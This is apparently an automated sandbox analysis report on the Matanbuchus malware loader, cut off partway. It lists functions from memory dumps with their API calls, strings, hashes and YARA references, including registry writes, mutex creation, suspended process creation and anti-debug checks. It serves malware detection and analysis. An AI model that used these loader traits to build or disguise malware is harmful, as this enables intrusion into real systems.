API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6daf6bc2eb6c1559c0c31e88dd2282f2a15a7d8b70d54b62ecb3f3720fae6a6e
Instruction ID: 9a10de5cf423e5ace35a7e5c5a79e8404c382f3c748fa1c8e23e84cf6571ee36
Opcode Fuzzy Hash: 6daf6bc2eb6c1559c0c31e88dd2282f2a15a7d8b70d54b62ecb3f3720fae6a6e
Instruction Fuzzy Hash: 01F01C3B420114BBCF121F92CC04A8A3F7AFF09AA0B144C21FA1995124D732C860DBA1

Function 7EE69375 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 291COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 7EE694EC

Strings

+, xrefs: 7EE6944A
-, xrefs: 7EE6943D

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: +$-
API String ID: 3732870572-2137968064
Opcode ID: 96dc4fa864d39e531bd8ede5cc044c7597709758106bdb0bf1fcf151fe48067b
Instruction ID: 728b3c713aab7d9d37855510f7562f5be6fb769c417772ec6a78dedb90ed452d
Opcode Fuzzy Hash: 96dc4fa864d39e531bd8ede5cc044c7597709758106bdb0bf1fcf151fe48067b
Instruction Fuzzy Hash: 4DA1F4389952899FCB01CE7DC8906EE7BB1EF46328F048DD9EC669B394D232D501CB60

Function 7EE355B0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCONCRTD ref: 7EE35868

Strings

parse error, xrefs: 7EE35633, 7EE3566E
parse_error, xrefs: 7EE355D5

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: std::exception::exception
String ID: parse error$parse_error
API String ID: 2807920213-1820534363
Opcode ID: 05d48e68fdd66e7a7be9796219e2e44f28838152fb22d1808769c0bc99169c4e
Instruction ID: 2e84134ea2f22db5e94c77e6d65b4a21b75bfaf771f1dabe28a7a3fac333fbce
Opcode Fuzzy Hash: 05d48e68fdd66e7a7be9796219e2e44f28838152fb22d1808769c0bc99169c4e
Instruction Fuzzy Hash: ECA116B8D05258DFCB14CF98C990BEEBBB1BF49300F208599D959AB355D7306A85CF90

Function 7EE64556 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 7EE6457B

Strings

MOC, xrefs: 7EE6458D
RCC, xrefs: 7EE64595

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 96ce780fbddf9d17c479e388ee84d0567ab6915f4d9007ae825c373c44385832
Instruction ID: fb773630492414bbf3718dbd6708812bb97829ebc0dcc20b0a795005c009dbae
Opcode Fuzzy Hash: 96ce780fbddf9d17c479e388ee84d0567ab6915f4d9007ae825c373c44385832
Instruction Fuzzy Hash: 304189B6940209AFCF02CF94DC80EEEBBB5BF48308F144959F906A7250D3359A60DB60

Function 7EE17AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 7EE17AF3
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 7EE17BBF

Part of subcall function 7EE5FEA2: _Yarn.LIBCPMT ref: 7EE5FEC1
Part of subcall function 7EE5FEA2: _Yarn.LIBCPMT ref: 7EE5FEE5

Strings

bad locale name, xrefs: 7EE17BC9

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: ae37d8193ab55e400c636115c81f426260979fa3d18203e50203cd34ed29db56
Instruction ID: ca86905af4d118c275f1bfad94ab7e256d1b473ee276c7fca972ca830760c2fd
Opcode Fuzzy Hash: ae37d8193ab55e400c636115c81f426260979fa3d18203e50203cd34ed29db56
Instruction Fuzzy Hash: 6B4137B4D05289DFDB01CF98C954BAEFBF1BF49304F248698D414AB381C77A9A41CBA5

Function 7EE64EF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000001,7F1655E4,?,?,?,7EE650E6,00000004,InitializeCriticalSectionEx,7EE8AE34,InitializeCriticalSectionEx,00000000,?,7EE64E9D,7F1655E4,00000FA0), ref: 7EE64F75
GetProcAddress.KERNEL32(00000000,?), ref: 7EE64F7F

Strings

C=~, xrefs: 7EE64F43

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressFreeLibraryProc
String ID: C=~
API String ID: 3013587201-3346514395
Opcode ID: 592eb36888007dc65b4122c3cadef1f2747a8974afd0fba5930bf66da7cc840c
Instruction ID: e54bb685b7f34e90b3b1a7208b8a7be8cb66979a80a6d38d487b1d315efe0254
Opcode Fuzzy Hash: 592eb36888007dc65b4122c3cadef1f2747a8974afd0fba5930bf66da7cc840c
Instruction Fuzzy Hash: B211B23A6A1115DF8B03CF55D89098A37B5FF463667242969FD16DB248EB30D901CBD0

Function 7EE189B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 7EE18A31

Strings

V|~, xrefs: 7EE189B9
V|~, xrefs: 7EE18A06, 7EE18A11, 7EE18A26, 7EE18A39, 7EE18A42, 7EE18A2C

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: V|~$V|~
API String ID: 2659868963-928374464
Opcode ID: 9560902d5a10b66eb6f53375e50296daa81e61ce7328a30efe53da347c34eaf0
Instruction ID: f4e250d1934afb4edf60e635c48825d0a29ce532e94b9cedf0f91c66b8a43ec5
Opcode Fuzzy Hash: 9560902d5a10b66eb6f53375e50296daa81e61ce7328a30efe53da347c34eaf0
Instruction Fuzzy Hash: FA21F4B8D052499FCB05CF98C450AEEFFB1BF48304F1481AAD859B7301D331AA81CBA5

Function 7EE04A70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMTD ref: 7EE04A87

Strings

!J~, xrefs: 7EE04A76, 7EE04A82
!J~, xrefs: 7EE04A7F, 7EE04A8C, 7EE04A8F

Memory Dump Source

Source File: 00000004.00000002.4168015089.000000007EE00000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EE00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ee00000_rundll32.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: !J~$!J~
API String ID: 118556049-864044967
Opcode ID: a1abe9a9221fa6d6b22fbd57380c33b7133d727115df8711cf372a32463a87d5
Instruction ID: a1038fa6e87b40810d6aa07997f7ea7ae39af0747f19e27c878948cebcdbb192
Opcode Fuzzy Hash: a1abe9a9221fa6d6b22fbd57380c33b7133d727115df8711cf372a32463a87d5
Instruction Fuzzy Hash: 7AF04478D1111CEBCB04DFA8C58069DF7B5EF44244F2089A9D80697348E330AB50CB85

Analysis Process: regsvr32.exePID: 3332, Parent PID: 5324COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	72.2%
Signature Coverage:	20.3%
Total number of Nodes:	79
Total number of Limit Nodes:	3

Executed Functions

Function 6BED51C0 Relevance: 27.1, APIs: 7, Strings: 8, Instructions: 824
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 6BED52F1
y=', xrefs: 6BED5926
*, xrefs: 6BED51E9
ntdll, xrefs: 6BED5FA7
E, xrefs: 6BED679D
TMP, xrefs: 6BED55A5
WinHttpReadData, xrefs: 6BED6E3F
AzureAD-SecureConv, xrefs: 6BED6BB8

Memory Dump Source

Source File: 00000006.00000002.2050309350.000000006BEB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6BEB0000, based on PE: true

Associated: 00000006.00000002.2050282306.000000006BEB0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050337503.000000006BEEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050355079.000000006BEFA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050499345.000000006C3A7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050527378.000000006C3A8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6beb0000_regsvr32.jbxd

Similarity

API ID:
String ID: y='$*$8$AzureAD-SecureConv$E$TMP$WinHttpReadData$ntdll
API String ID: 0-3123300459
Opcode ID: b95adc87dc118df025934d5be8a4322282aeab553f19421e411acbca06b04dbc
Instruction ID: 0abffacbc7ca9985109fe3ebfccaa40fd4062d1e7a7a6b9fe69ac99f3305cb66
Opcode Fuzzy Hash: b95adc87dc118df025934d5be8a4322282aeab553f19421e411acbca06b04dbc
Instruction Fuzzy Hash: 989206B0D44268CFDB14CF69D890BADBBB5BF8A304F1091DAD449AB340D778AA85CF54

Function 7EEF77A0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 331
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexA.KERNEL32(00000000,00000001,?), ref: 7EEF7A47
GetLastError.KERNEL32 ref: 7EEF7B44
CloseHandle.KERNEL32(00000000,6FA9D62B,?,?,?), ref: 7EEF7CBA

Strings

B, xrefs: 7EEF7AED
{, xrefs: 7EEF7834
9mD, xrefs: 7EEF78A9
u, xrefs: 7EEF78D3
*, xrefs: 7EEF7A5A

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseCreateErrorHandleLastMutex
String ID: *$9mD$B$u${
API String ID: 4294037311-4130828584
Opcode ID: 1c43e023ce287260ee3bf63d8f483c16fd4b98550c3f51f788403301514ed81f
Instruction ID: 9732b547116277651c3e3911f96685e9aafc6ee4ca0449dca3b8b8b3cc90af1d
Opcode Fuzzy Hash: 1c43e023ce287260ee3bf63d8f483c16fd4b98550c3f51f788403301514ed81f
Instruction Fuzzy Hash: 87F16D75D14299DFDB94CFAAC8907ADBBB1BF48304F2085AEE45AAB350D3344A81CF51

Function 7EF2CAF0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 7EF2CCEE

Strings

), xrefs: 7EF2CBCF
?, xrefs: 7EF2CCD1
m, xrefs: 7EF2CC15
2, xrefs: 7EF2CAFB
e, xrefs: 7EF2CC0B
n , xrefs: 7EF2CB0E

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DirectorySystem
String ID: )$2$?$m$n $e
API String ID: 2188284642-1749247282
Opcode ID: 1f6567d701276fe6eb1baa7a51c52c0eb255404f86ed8d9a8822dcf860e8bbd5
Instruction ID: 310653fa9483e2d7a134d579a41c941de645d52652305bbb9c7c228fa19e80c5
Opcode Fuzzy Hash: 1f6567d701276fe6eb1baa7a51c52c0eb255404f86ed8d9a8822dcf860e8bbd5
Instruction Fuzzy Hash: C2F15975D046A8CBDB65CF66C8A47ADBBB5BF89301F2080EED05AAB750D7741A80CF50

Function 7EF19280 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetShellWindow.USER32 ref: 7EF19497

Strings

\, xrefs: 7EF1933A
2, xrefs: 7EF1945E
MNo name attribute , xrefs: 7EF192FF
c, xrefs: 7EF192F7
Q, xrefs: 7EF19294

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ShellWindow
String ID: 2$MNo name attribute $Q$\$c
API String ID: 2831631499-3960561890
Opcode ID: d1da29ef7a1eb9df4b5da22d0ac5d8c864f770bcf6efa577db32cba7e1fc4ef4
Instruction ID: 5243a66452118f5c455ebf1f88509f2434a4ff926862ee279b7915ddcc8f03cb
Opcode Fuzzy Hash: d1da29ef7a1eb9df4b5da22d0ac5d8c864f770bcf6efa577db32cba7e1fc4ef4
Instruction Fuzzy Hash: C3A125B6D08298DFDB54CFAAC4907ADBBB1BF49300F20819ED46AAB741D7744A84CF51

Function 7EF195F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 7EF1986F
GetDriveTypeA.KERNEL32(7EF581EC), ref: 7EF19903

Strings

*, xrefs: 7EF19846

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: DriveHeapProcessType
String ID: *
API String ID: 2912393814-163128923
Opcode ID: 8b64d3bb3822bb0b78f0d9e404606197ea65aed10c18356f7f7954f8d37de16b
Instruction ID: 6e19a81d78f9704258f0f8469d74a92d63d1fa95f5aaf3834849723ec6f29447
Opcode Fuzzy Hash: 8b64d3bb3822bb0b78f0d9e404606197ea65aed10c18356f7f7954f8d37de16b
Instruction Fuzzy Hash: FBA115B5D082D9CFCB94CFAAC45079DBBB2BB49310F20859ED46AAB750D7304A84CF51

Non-executed Functions

Function 7EF31417 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7EF31423
IsDebuggerPresent.KERNEL32 ref: 7EF314EF
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7EF31508
UnhandledExceptionFilter.KERNEL32(?), ref: 7EF31512

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 61273575094359a741efa36014d071bb74a82318b89cf2ad01d35782b7362515
Instruction ID: 59cfa06df4faef6e2fe35b8247f5b2ef0b7739f1b1ffe2f9d9c5b78da40ce656
Opcode Fuzzy Hash: 61273575094359a741efa36014d071bb74a82318b89cf2ad01d35782b7362515
Instruction Fuzzy Hash: 65310979C05218DBDB50DFA0C959BCDBBF8AF08300F1041AAE40EA7240E7719B85CF45

Function 7EF1E1C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 7EF1E379
__aulldiv.LIBCMT ref: 7EF1E387

Strings

@, xrefs: 7EF1E1CC

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: __aulldiv
String ID: @
API String ID: 3732870572-2766056989
Opcode ID: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
Instruction ID: b06633bcc52181ea38f2f3c9fa52e07a223d3912dd968f22e31611e94cdea892
Opcode Fuzzy Hash: 5f4f48760db2e552bb39d169258d1ac138e117acb2fc7a97c82604e7304871c4
Instruction Fuzzy Hash: BD7180B8E04259DFCB08CF99C5A0AEEFBB1BF48304F24819AD915AB345D734AA41CF55

Function 7EEF6570 Relevance: 25.7, APIs: 4, Strings: 13, Instructions: 244COMMON

Download Yara Rule

Strings

i, xrefs: 7EEF65EF
u, xrefs: 7EEF65DB
*, xrefs: 7EEF65C3
7, xrefs: 7EEF65CF
ivh, xrefs: 7EEF661E
X, xrefs: 7EEF65B3
>, xrefs: 7EEF65D3
7, xrefs: 7EEF65C7
1, xrefs: 7EEF65BB
w, xrefs: 7EEF65EB
,, xrefs: 7EEF65D7
+, xrefs: 7EEF65CB
;, xrefs: 7EEF65BF

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *$+$,$1$7$7$;$>$X$i$ivh$u$w
API String ID: 0-285284801
Opcode ID: e197871bf085e3c289b673fb103495e77ee8cee07856396a12f99318ec32a0c4
Instruction ID: 9f87ceddcb53d685dde30ddf9aa92998be552356b626aa0114ca72cf01c6b852
Opcode Fuzzy Hash: e197871bf085e3c289b673fb103495e77ee8cee07856396a12f99318ec32a0c4
Instruction Fuzzy Hash: 69B15574E08289DFEB01CF98C854BDEBBB1BF48308F104559E945BB381D7B55A45CBA1

Function 7EEDC1A0 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 353COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 7EEDC45B

Strings

d, xrefs: 7EEDC39C
n_chars < number_buffer.size() - 1, xrefs: 7EEDC429
x < 0 and x < (std::numeric_limits<number_integer_t>::max)(), xrefs: 7EEDC283
d, xrefs: 7EEDC445
B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EEDC27E, 7EEDC424
@, xrefs: 7EEDC40D
d, xrefs: 7EEDC2E0

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: __aullrem
String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$n_chars < number_buffer.size() - 1$x < 0 and x < (std::numeric_limits<number_integer_t>::max)()
API String ID: 3758378126-3644039597
Opcode ID: 87f926de5e67de0323f616d13bb76106a4a93f149db405a456934934762244ae
Instruction ID: 546c635366c5a49a052fdcde49507db31cb698d6130e0f1c3cccf7268f5e93be
Opcode Fuzzy Hash: 87f926de5e67de0323f616d13bb76106a4a93f149db405a456934934762244ae
Instruction Fuzzy Hash: 84F1F478D04219DFDB14CF98C890B9DBBB2FF88344F2085AAD919A7344D7705A8ACF94

Function 7EEDC650 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 320COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 7EEDC89A
__aulldiv.LIBCMT ref: 7EEDC8AE

Strings

d, xrefs: 7EEDC884
n_chars < number_buffer.size() - 1, xrefs: 7EEDC868
B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EEDC6D0, 7EEDC863
d, xrefs: 7EEDC71F
d, xrefs: 7EEDC7DB
@, xrefs: 7EEDC84C
false, xrefs: 7EEDC6D5

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: __aulldiv__aullrem
String ID: @$B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$d$d$d$false$n_chars < number_buffer.size() - 1
API String ID: 3839614884-178659603
Opcode ID: b9193570fcdadd7633fdce50f14ce53d4d0939c133444cd3e9a2cbed39e47d7f
Instruction ID: bfca1851d8a93c204b40879d789997262f0b4f58efd21ae41704714d1ba9bf46
Opcode Fuzzy Hash: b9193570fcdadd7633fdce50f14ce53d4d0939c133444cd3e9a2cbed39e47d7f
Instruction Fuzzy Hash: 9DE1C378E04219DFDB14CF98C880BDDBBB2BF48354F2085AAD919A7354D7306A86CF94

Function 7EF2EF10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE,00000000,000F003F,?,00000044,00000000), ref: 7EF2EF39
wsprintfW.USER32 ref: 7EF2EF86
RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,00000000,00000000), ref: 7EF2EFA3
RegSetValueExW.ADVAPI32(00000000,bbb,00000000,00000003,00000000,00000000), ref: 7EF2EFC4
RegSetValueExW.ADVAPI32(00000000,kkk,00000000,00000003,?,0000000F), ref: 7EF2EFE4
RegCloseKey.ADVAPI32(00000000), ref: 7EF2EFFD
RegCloseKey.ADVAPI32(00000000), ref: 7EF2F008

Part of subcall function 7EF2F6E7: GetTickCount.KERNEL32 ref: 7EF2F705

Strings

bbb, xrefs: 7EF2EFBC
kkk, xrefs: 7EF2EFDC
%s_%x%x, xrefs: 7EF2EF80
SOFTWARE, xrefs: 7EF2EF2C

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CloseValue$CountCreateOpenTickwsprintf
String ID: %s_%x%x$SOFTWARE$bbb$kkk
API String ID: 730945307-550109914
Opcode ID: 05f5248f00f625c2edfd0d4eea0b6f359cf88413d922d9138c031694f4097181
Instruction ID: 754f6f31d240d6fca57e26472a2a6faaf3a3215ccd128cf4f45621c36fa4a8ee
Opcode Fuzzy Hash: 05f5248f00f625c2edfd0d4eea0b6f359cf88413d922d9138c031694f4097181
Instruction Fuzzy Hash: 6E312776A00218FADB229A95CC59FDFBFBDEF44351F100065FA0AE6550D730AB54DBA0

Function 7EF2F11C Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 246processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 7EF2F149
IsWow64Process.KERNEL32(00000000), ref: 7EF2F150
CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 7EF2F18C
wsprintfW.USER32 ref: 7EF2F21A
CloseHandle.KERNEL32(00000000), ref: 7EF2F3A5
CloseHandle.KERNEL32(00000000), ref: 7EF2F3B0

Strings

?, xrefs: 7EF2F1B2
0x%x, xrefs: 7EF2F214

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: Process$CloseHandle$CreateCurrentWow64wsprintf
String ID: 0x%x$?
API String ID: 3386633596-4137330559
Opcode ID: 010f393ae525b4e90d43bacb69ad896c458b3ed5659c8a4923c7126eed240488
Instruction ID: 382af55927876d0e50564b41714f896ab45b634c9b74a98c2f0c04676346c7a3
Opcode Fuzzy Hash: 010f393ae525b4e90d43bacb69ad896c458b3ed5659c8a4923c7126eed240488
Instruction Fuzzy Hash: 2B812AB6E10108EFEF119BA4CDA5EEEB7FDEF08245F104476E906F2550E7359E608A60

Function 7EF33BE0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 7EF33C17
___except_validate_context_record.LIBVCRUNTIME ref: 7EF33C1F
_ValidateLocalCookies.LIBCMT ref: 7EF33CA8
__IsNonwritableInCurrentImage.LIBCMT ref: 7EF33CD3
_ValidateLocalCookies.LIBCMT ref: 7EF33D28
___vcrt_initialize_locks.LIBVCRUNTIME ref: 7EF33D3E
___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 7EF33D53

Strings

csm, xrefs: 7EF33CBD

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record___vcrt_initialize_locks___vcrt_uninitialize_locks
String ID: csm
API String ID: 1385549066-1018135373
Opcode ID: 9d14fe22a0514a7b8ecb3329928c001db59c173f40c36b6d78192a3d4848a5e2
Instruction ID: 727d2fa33254452dd658e72710dee57707504a92fe18231d7a723e5e01304d34
Opcode Fuzzy Hash: 9d14fe22a0514a7b8ecb3329928c001db59c173f40c36b6d78192a3d4848a5e2
Instruction Fuzzy Hash: 0141143CA01218DBCF00DF68C860A9EBBF5BF04264FA085A6EC255BB51D731EA45CB91

Function 6BEDFE80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6BEDFEB7
___except_validate_context_record.LIBVCRUNTIME ref: 6BEDFEBF
_ValidateLocalCookies.LIBCMT ref: 6BEDFF48
__IsNonwritableInCurrentImage.LIBCMT ref: 6BEDFF73
_ValidateLocalCookies.LIBCMT ref: 6BEDFFC8

Strings

csm, xrefs: 6BEDFFF1
csm, xrefs: 6BEDFF5D

Memory Dump Source

Source File: 00000006.00000002.2050309350.000000006BEB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6BEB0000, based on PE: true

Associated: 00000006.00000002.2050282306.000000006BEB0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050337503.000000006BEEB000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050355079.000000006BEFA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050499345.000000006C3A7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2050527378.000000006C3A8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6beb0000_regsvr32.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: ca384e6660ab6fdfb7b0ee5ae2a792ea1f784d4f88914a16ee1f6637abbf4566
Instruction ID: 66178d08b37a4773fa79ec40602f584da9a9759aa06aed80b213daa19a943114
Opcode Fuzzy Hash: ca384e6660ab6fdfb7b0ee5ae2a792ea1f784d4f88914a16ee1f6637abbf4566
Instruction Fuzzy Hash: 8351A334A002059FCF00DF68D881A5E7BB5BF46329F24819DE8156B392C77DEA53DBA1

Function 7EF2C5A0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 206COMMON

Download Yara Rule

APIs

IsCharLowerA.USER32(00000073), ref: 7EF2C78A
GetModuleFileNameW.KERNEL32(00000000,kernel32,00000000), ref: 7EF2C7AA

Strings

u, xrefs: 7EF2C6D5
{, xrefs: 7EF2C63C
kernel32, xrefs: 7EF2C7A3
9mD, xrefs: 7EF2C7EE

Memory Dump Source

Source File: 00000006.00000002.2050560714.000000007EED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EED0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7eed0000_regsvr32.jbxd

Yara matches

Similarity

API ID: CharFileLowerModuleName
String ID: 9mD$kernel32$u${
API String ID: 515556390-2230072418
Opcode ID: 7c768de94fea33e7c417ba71efbc358c71dfa8e3184356e4ad739f750d5d77a6
Instruction ID: 8ee19b40ea41184ffb1be5ad381210ee79b7587ddbf2875247f809da21fad6cd
